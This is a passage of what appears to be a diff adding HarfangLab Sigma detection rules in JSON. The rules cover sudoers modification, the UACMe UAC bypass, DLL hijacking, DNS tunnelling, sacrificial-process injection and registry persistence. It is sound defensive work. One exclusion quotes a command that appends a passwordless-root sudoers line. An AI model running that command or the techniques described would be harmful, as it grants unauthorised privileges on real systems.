- classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/sudoers'\n - '/etc/sudoers.d/*'\n - TargetPath:\n - '/etc/sudoers'\n - '/etc/sudoers.d/*'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'remove'\n - 'chmod'\n - 'chown'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - 
ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds:\n - ProcessCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n - '/usr/bin/python* /usr/bin/reconfigure'\n - ProcessParentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessGrandparentImage: '/usr/bin/rpm'\n\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessCommandLine|startswith: '/usr/bin/ruby /usr/bin/puppet'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/snap/docker/*/bin/dockerd'\n - ProcessGrandparentImage: '/usr/bin/dockerd'\n - ProcessAncestors|contains: '|/usr/bin/dockerd|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_common:\n - ProcessImage:\n - '/usr/bin/rm'\n - '/bin/chmod'\n - '/usr/bin/chmod'\n - '/bin/chown'\n - '/usr/bin/chown'\n - '/kaniko/executor'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/packagekitd'\n - '/usr/bin/podman'\n - '/usr/bin/touch'\n - '/usr/bin/dpkg-statoverride'\n - '/usr/sbin/cfagent'\n - '/usr/sbin/adsysd'\n - '/bin/busybox'\n - '/usr/bin/rsync'\n - '/usr/bin/dos2unix'\n - '/snap/snapd/*/usr/lib/snapd/snap-confine'\n - ProcessGrandparentImage:\n - '/kaniko/executor'\n - '/usr/bin/runc'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/bin/podman'\n\n # template_exclusion_ansible\n\n exclusion_salt:\n - ProcessCommandLine: '/usr/bin/python* /usr/bin/salt-minion'\n - ProcessImage: '/opt/saltstack/salt/bin/python?.??'\n\n 
exclusion_cloud-init:\n ProcessCommandLine|startswith: '/usr/bin/python? /usr/bin/cloud-init'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_sophos:\n ProcessParentImage: '/opt/sophos-av/engine/_/savd.?'\n\n exclusion_aws:\n ProcessParentImage: '/usr/bin/ssm-agent-worker'\n\n exclusion_rename:\n Kind: 'rename'\n ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n TargetPath:\n - '/etc/sudoers~'\n - '/etc/sudoers.d/*~'\n\n exclusion_temp_file:\n - ProcessImage: '/usr/bin/sed'\n Path: '/etc/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/etc/sed??????'\n\n exclusion_cyberwatch:\n ProcessGrandparentCommandLine|contains:\n - '|| echo \"# cyberwatch privileges\" | sudo tee -a /etc/sudoers'\n - '|| echo \"Defaults:cyberwatch !requiretty\" | sudo tee -a /etc/sudoers'\n - '|| echo \"cyberwatch ALL=(ALL) NOPASSWD:ALL\" | sudo tee -a /etc/sudoers'\n\n exclusion_buildah:\n ProcessGrandparentImage: '/usr/bin/buildah'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2bb34ffc-2356-4191-b774-bc4fc82ee828", + "rule_name": "Sudo Configuration Modified (Linux)", + "rule_description": "Detects a suspicious attempt to modify the content of '/etc/sudoers' or any file within '/etc/sudoers.d'.\nThese files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\nTheir modification can be an attempt to elevate privileges.\nIt is recommended to investigate the process responsible for this action for suspicious activities.\n", + "rule_creation_date": "2022-10-27", + "rule_modified_date": "2026-03-20", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + 
"attack.t1548.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2bbd2cab-7189-4801-aff8-def8972e59db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.606241Z", + "creation_date": "2026-03-23T11:45:34.606245Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.606252Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/hfiref0x/UACME", + "https://attack.mitre.org/techniques/T1548/002/" + ], + "name": "t1548_002_akagi.yml", + "content": "title: UACMe HackTool Executed\nid: 2bbd2cab-7189-4801-aff8-def8972e59db\ndescription: |\n Detects the execution of UACMe (Akagi) User Account Control bypass toolkit.\n UACMe is a well-known privilege escalation tool that contains multiple techniques to bypass Windows UAC protection mechanisms.\n It is frequently used by attackers after initial access to elevate privileges without triggering UAC prompts.\n It is recommended to investigate the process ancestry and any subsequent high-privilege process creations.\nreferences:\n - https://github.com/hfiref0x/UACME\n - 
https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/10/27\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.UACMe\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Akagi.exe'\n InternalName: 'Akagi'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2bbd2cab-7189-4801-aff8-def8972e59db", + "rule_name": "UACMe HackTool Executed", + "rule_description": "Detects the execution of UACMe (Akagi) User Account Control bypass toolkit.\nUACMe is a well-known privilege escalation tool that contains multiple techniques to bypass Windows UAC protection mechanisms.\nIt is frequently used by attackers after initial access to elevate privileges without triggering UAC prompts.\nIt is recommended to investigate the process ancestry and any subsequent high-privilege process creations.\n", + "rule_creation_date": "2021-10-27", + "rule_modified_date": "2025-03-31", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1548.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2bc7247d-de5a-436c-a772-bb81fb27eda8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, 
+ "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.609754Z", + "creation_date": "2026-03-23T11:45:34.609757Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.609765Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://medium.com/@boutnaru/the-windows-process-journey-runlegacycplelevated-exe-93f040f78c54", + "https://attack.mitre.org/techniques/T1548/002/" + ], + "name": "t1548_002_runlegacycplelevated.yml", + "content": "title: RunLegacyCPLElevated Executed\nid: 2bc7247d-de5a-436c-a772-bb81fb27eda8\ndescription: |\n Detects the execution of RunLegacyCPLElevated.exe, a legitimate Windows binary used for running a legacy control panel applet in elevated mode.\n Adversaries may use RunLegacyCPLElevated to execute CPL file with high privileges.\n It is recommended to check child processes of RunLegacyCPLElevated for suspicious activities.\nreferences:\n - https://medium.com/@boutnaru/the-windows-process-journey-runlegacycplelevated-exe-93f040f78c54\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2025/03/10\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.RunLegacyCPLElevated\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - ProcessName: 'RunLegacyCPLElevated.EXE'\n - ProcessOriginalFileName: 'RunLegacyCPLElevated.EXE'\n\n 
condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2bc7247d-de5a-436c-a772-bb81fb27eda8", + "rule_name": "RunLegacyCPLElevated Executed", + "rule_description": "Detects the execution of RunLegacyCPLElevated.exe, a legitimate Windows binary used for running a legacy control panel applet in elevated mode.\nAdversaries may use RunLegacyCPLElevated to execute CPL file with high privileges.\nIt is recommended to check child processes of RunLegacyCPLElevated for suspicious activities.\n", + "rule_creation_date": "2025-03-10", + "rule_modified_date": "2025-04-08", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1548.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2bdea909-ca39-4efc-bb11-094f0831e19b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.593230Z", + "creation_date": "2026-03-23T11:45:34.593234Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.593242Z", + "rule_level": "high", + 
"rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_getmac.yml", + "content": "title: DLL Hijacking via getmac.exe\nid: 2bdea909-ca39-4efc-bb11-094f0831e19b\ndescription: |\n Detects potential Windows DLL Hijacking via getmac.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'getmac.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - 
'?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2bdea909-ca39-4efc-bb11-094f0831e19b", + "rule_name": "DLL Hijacking via getmac.exe", + "rule_description": "Detects potential Windows DLL Hijacking via getmac.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2c30d455-a333-49ed-82ac-70467657685d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.612914Z", + "creation_date": "2026-03-23T11:45:34.612918Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.612956Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/", + "https://attack.mitre.org/techniques/T1048/003/", + "https://attack.mitre.org/techniques/T1568/003/" + ], + "name": "t1071_004_long_dns_request_linux.yml", + "content": "title: Abnormally Long DNS Name Resolved (Linux)\nid: 2c30d455-a333-49ed-82ac-70467657685d\ndescription: |\n Detects an abnormally long DNS query, usually associated with DNS tunneling.\n Adversaries may use DNS protocol to communicate with their C&C.\n It is recommended to check the content of the request and for suspicious behavior by the process making the request.\nreferences:\n - https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1568/003/\ndate: 2024/09/26\nmodified: 2025/09/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n ProcessImage|contains: '?'\n QueryName|re: '[a-zA-Z0-9.-]{255}'\n\n exclusion_neterror:\n QueryName|startswith: 
'about:neterror\\?e=redirectloop&u=https%3a//'\n\n exclusion_glpi:\n - ProcessImage: '/usr/bin/perl'\n ProcessCommandLine|contains: 'glpi-agent'\n - ProcessParentImage: '/usr/bin/perl'\n ProcessCommandLine|contains: 'glpi-agent'\n\n exclusion_nagios:\n ProcessParentImage: '/usr/sbin/nrpe'\n\n exclusion_puppet:\n ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2c30d455-a333-49ed-82ac-70467657685d", + "rule_name": "Abnormally Long DNS Name Resolved (Linux)", + "rule_description": "Detects an abnormally long DNS query, usually associated with DNS tunneling.\nAdversaries may use DNS protocol to communicate with their C&C.\nIt is recommended to check the content of the request and for suspicious behavior by the process making the request.\n", + "rule_creation_date": "2024-09-26", + "rule_modified_date": "2025-09-09", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.exfiltration" + ], + "rule_technique_tags": [ + "attack.t1048.003", + "attack.t1071.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2c3aa5ca-f30f-4e2e-924d-43c8087144f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + 
"is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.079552Z", + "creation_date": "2026-03-23T11:45:34.079554Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.079559Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/", + "https://attack.mitre.org/techniques/T1055/" + ], + "name": "t1055_sacrificial_process_openwith.yml", + "content": "title: OpenWith.exe Sacrificial Process Spawned\nid: 2c3aa5ca-f30f-4e2e-924d-43c8087144f4\ndescription: |\n Detects the suspicious execution of the legitimate OpenWith.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action and the destination IP address of the OpenWith.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/08/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: 
'?:\\Windows\\System32\\OpenWith.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n exclusion_rpcnet:\n ProcessAncestors: '?:\\Windows\\SysWOW64\\svchost.exe|?:\\Windows\\SysWOW64\\rpcnet.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2c3aa5ca-f30f-4e2e-924d-43c8087144f4", + "rule_name": "OpenWith.exe Sacrificial Process Spawned", + "rule_description": "Detects the suspicious execution of the legitimate OpenWith.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the OpenWith.exe process to determine the legitimacy of this behavior.\n", + "rule_creation_date": "2024-03-27", + "rule_modified_date": "2025-08-25", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1055" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.626477Z", + "creation_date": "2026-03-23T11:45:34.626479Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.626483Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://deceptiq.com/blog/ntuser-man-registry-persistence", + "https://attack.mitre.org/techniques/T1547/001/" + ], + "name": "t1547_001_registry_mandatory_profile.yml", + "content": "title: User Registry Hive Hijacked via Mandatory Profile\nid: 2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6\ndescription: |\n Detects the creation or modification of an NTUSER.MAN file in a user profile directory.\n Attackers may plant a crafted NTUSER.MAN (mandatory user profile) file to load any registry keys into the user's HKCU hive at next logon without invoking registry APIs or triggering kernel registry callbacks, thus bypassing security solutions.\n It is recommended to validate whether the file creation is legitimate within your environment.\nreferences:\n - https://deceptiq.com/blog/ntuser-man-registry-persistence\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2026/01/08\nmodified: 2026/01/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n - Path: '?:\\Users\\\\*\\NTUSER.MAN'\n 
Kind: 'create'\n - TargetPath: '?:\\Users\\\\*\\NTUSER.MAN'\n Kind: 'rename'\n\n exclusion_profsvc:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s ProfSvc'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\windows\\system32\\svchost.exe -k netsvcs'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6", + "rule_name": "User Registry Hive Hijacked via Mandatory Profile", + "rule_description": "Detects the creation or modification of an NTUSER.MAN file in a user profile directory.\nAttackers may plant a crafted NTUSER.MAN (mandatory user profile) file to load any registry keys into the user's HKCU hive at next logon without invoking registry APIs or triggering kernel registry callbacks, thus bypassing security solutions.\nIt is recommended to validate whether the file creation is legitimate within your environment.\n", + "rule_creation_date": "2026-01-08", + "rule_modified_date": "2026-01-09", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1547.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2cacb51e-86d2-4851-9e44-b3544e02427f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": 
"b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.091445Z", + "creation_date": "2026-03-23T11:45:34.091447Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.091452Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_fltmc.yml", + "content": "title: DLL Hijacking via fltmc.exe\nid: 2cacb51e-86d2-4851-9e44-b3544e02427f\ndescription: |\n Detects potential Windows DLL Hijacking via fltmc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL 